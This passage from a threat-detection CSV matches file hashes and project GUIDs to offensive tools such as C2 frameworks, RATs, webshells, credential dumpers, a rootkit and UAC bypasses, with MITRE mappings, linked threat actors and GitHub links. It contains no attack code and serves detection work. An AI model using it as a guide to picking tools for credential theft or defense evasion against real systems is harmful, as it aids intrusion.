T1056 - 
T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26239" "*4CA05D5C-AF6B-4F45-81E0-788BAA8D11A2*",".{0,1000}4CA05D5C\-AF6B\-4F45\-81E0\-788BAA8D11A2.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#GUIDproject","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","26240" "*4ca2ba1a91f4977c79f130d516ca39d92c5be9178bb9b264d16927cc7e820fec*",".{0,1000}4ca2ba1a91f4977c79f130d516ca39d92c5be9178bb9b264d16927cc7e820fec.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26241" "*4cad33627c6f2cf9c1ae39d6fb625e23d5f32b41bbaff54e7993349371f5590c*",".{0,1000}4cad33627c6f2cf9c1ae39d6fb625e23d5f32b41bbaff54e7993349371f5590c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26242" "*4caedf29083d75d0d6687f56981fda77cce0849f*",".{0,1000}4caedf29083d75d0d6687f56981fda77cce0849f.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","26243" "*4cb9f011b700a4e9cad44ca5b8998ae431fcf8ee74f63d343c2504ff6efb1b8e*",".{0,1000}4cb9f011b700a4e9cad44ca5b8998ae431fcf8ee74f63d343c2504ff6efb1b8e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26245" "*4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4*",".{0,1000}4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#filehash","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","26247" "*4cd278347df495ec92b7acd31c4c61ef13fd6dd9faab74acb09b2ef4360aac6b*",".{0,1000}4cd278347df495ec92b7acd31c4c61ef13fd6dd9faab74acb09b2ef4360aac6b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26249" "*4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e*",".{0,1000}4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26250" "*4ce98911b8e13393c58578be23e85776dbf7c95ec878b9f08748d0921855c36b*",".{0,1000}4ce98911b8e13393c58578be23e85776dbf7c95ec878b9f08748d0921855c36b.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#filehash","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","26256" "*4cec28b4c00002245dffc8346be0cc11*",".{0,1000}4cec28b4c00002245dffc8346be0cc11.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","26258" 
"*4ced09f82c47dc6b5943d5bf74a340113f3f6fc193964e1f9a63591850148aaa*",".{0,1000}4ced09f82c47dc6b5943d5bf74a340113f3f6fc193964e1f9a63591850148aaa.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26259" "*4ced72b74d1b71171e8af3139858e9f59455f9ce99c426b7b8ab7b436435fb45*",".{0,1000}4ced72b74d1b71171e8af3139858e9f59455f9ce99c426b7b8ab7b436435fb45.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26260" "*4cf4468e6bc420ffeb92c8ebad8009cc23f2b5fb35b789511d4cc73d7ed157d7*",".{0,1000}4cf4468e6bc420ffeb92c8ebad8009cc23f2b5fb35b789511d4cc73d7ed157d7.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","26261" "*4d014c7195a8b7507aa7bc95825371ca83465880e95bdbd411b4dae0a57539af*",".{0,1000}4d014c7195a8b7507aa7bc95825371ca83465880e95bdbd411b4dae0a57539af.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26262" "*4d14760b49f084714c356b922b2889402fca1faa5145f64c4441746897fe4d7b*",".{0,1000}4d14760b49f084714c356b922b2889402fca1faa5145f64c4441746897fe4d7b.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","26266" "*4D164EDE-7180-4A1B-BE82-59BB87542037*",".{0,1000}4D164EDE\-7180\-4A1B\-BE82\-59BB87542037.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26268" "*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*",".{0,1000}4D1B765D\-1287\-45B1\-AEDC\-C4B96CF5CAA2.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#GUIDproject","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","26269" "*4d1c4cce9f9eb46d0769639886125b3e378621cffddc61d802dfcc9de8018ebe*",".{0,1000}4d1c4cce9f9eb46d0769639886125b3e378621cffddc61d802dfcc9de8018ebe.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","26270" "*4d1fd422503b03f89fba5fa6d51e5bccb3e6cd3254461de316ca25296da38d4b*",".{0,1000}4d1fd422503b03f89fba5fa6d51e5bccb3e6cd3254461de316ca25296da38d4b.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","26272" "*4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1*",".{0,1000}4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26273" "*4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d*",".{0,1000}4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26274" "*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*",".{0,1000}4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","26275" "*4d29f1251e4ef23a8e22ed209d547e84c421fa736b87646ddd8269c3a0e84093*",".{0,1000}4d29f1251e4ef23a8e22ed209d547e84c421fa736b87646ddd8269c3a0e84093.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","26276" "*4d2d4f8ebeeecca1e823c2f63975a959da91840f681df53243c6caa16ed67621*",".{0,1000}4d2d4f8ebeeecca1e823c2f63975a959da91840f681df53243c6caa16ed67621.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26277" "*4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263*",".{0,1000}4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","26278" "*4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb*",".{0,1000}4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","26280" "*4d352942cc659ab92345eeb0a8b9d6c974b5123c2f05db2488a27028b3c8f746*",".{0,1000}4d352942cc659ab92345eeb0a8b9d6c974b5123c2f05db2488a27028b3c8f746.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26282" 
"*4d3bae5b-eb71-413b-adb2-a58f1fa2ad64*",".{0,1000}4d3bae5b\-eb71\-413b\-adb2\-a58f1fa2ad64.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#GUIDproject","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","26283" "*4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f*",".{0,1000}4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26286" "*4d50500e4170dc1fd2dd377467ad2722fa0db20a0d90407d15e6856175f26fca*",".{0,1000}4d50500e4170dc1fd2dd377467ad2722fa0db20a0d90407d15e6856175f26fca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26287" "*4d50951bb2357ec9dfc9e97c4fb8729c7a1d94b5d113683912469a7a05859992*",".{0,1000}4d50951bb2357ec9dfc9e97c4fb8729c7a1d94b5d113683912469a7a05859992.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed 
used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26288" "*4d5350c8-7f8c-47cf-8cde-c752018af17e*",".{0,1000}4d5350c8\-7f8c\-47cf\-8cde\-c752018af17e.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#GUIDproject","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","26289" "*4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc*",".{0,1000}4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","26290" "*4d5ee19778d34bdddd4c391ed860d10d2d3a46c22090fa0e701e263bec6bca2c*",".{0,1000}4d5ee19778d34bdddd4c391ed860d10d2d3a46c22090fa0e701e263bec6bca2c.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","26291" "*4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844*",".{0,1000}4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26292" "*4d64e31510b95312900f0a12bffb0f9130363da3dcb90cf4e7717427937fe058*",".{0,1000}4d64e31510b95312900f0a12bffb0f9130363da3dcb90cf4e7717427937fe058.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26293" "*4d6d37ca48cd2999f2362975d0ede5f28dec0780d6815db75ff450aef1aabf12*",".{0,1000}4d6d37ca48cd2999f2362975d0ede5f28dec0780d6815db75ff450aef1aabf12.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","26295" "*4d710fdd6e18bf8ad16847a9e03cf858b20eaeec3e6b8fe9ac1b29eb36883892*",".{0,1000}4d710fdd6e18bf8ad16847a9e03cf858b20eaeec3e6b8fe9ac1b29eb36883892.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26296" "*4D71336E-6EF6-4DF1-8457-B94DC3D73FE7*",".{0,1000}4D71336E\-6EF6\-4DF1\-8457\-B94DC3D73FE7.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","26297" "*4d7424482e96e9326182ad86bbe68a0f7b9da63d7508552649f05a18848d4bad*",".{0,1000}4d7424482e96e9326182ad86bbe68a0f7b9da63d7508552649f05a18848d4bad.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","26298" 
"*4d76a28ba8830185fde42e139a27d7bd8197f33810b06fcfb7980c8ddba589cf*",".{0,1000}4d76a28ba8830185fde42e139a27d7bd8197f33810b06fcfb7980c8ddba589cf.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","26300" "*4d76e208d1d7d828e35725d30cdb907cef2bd52e2c5cf9ec4290182f4464d2e8*",".{0,1000}4d76e208d1d7d828e35725d30cdb907cef2bd52e2c5cf9ec4290182f4464d2e8.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","26301" "*4D7AEF0B-5AA6-4AE5-971E-7141AA1FDAFC*",".{0,1000}4D7AEF0B\-5AA6\-4AE5\-971E\-7141AA1FDAFC.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","#GUIDproject","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","26303" "*4D7BA537-54EC-4005-9CC2-AE134B4526F9*",".{0,1000}4D7BA537\-54EC\-4005\-9CC2\-AE134B4526F9.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","#GUIDproject","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","26304" 
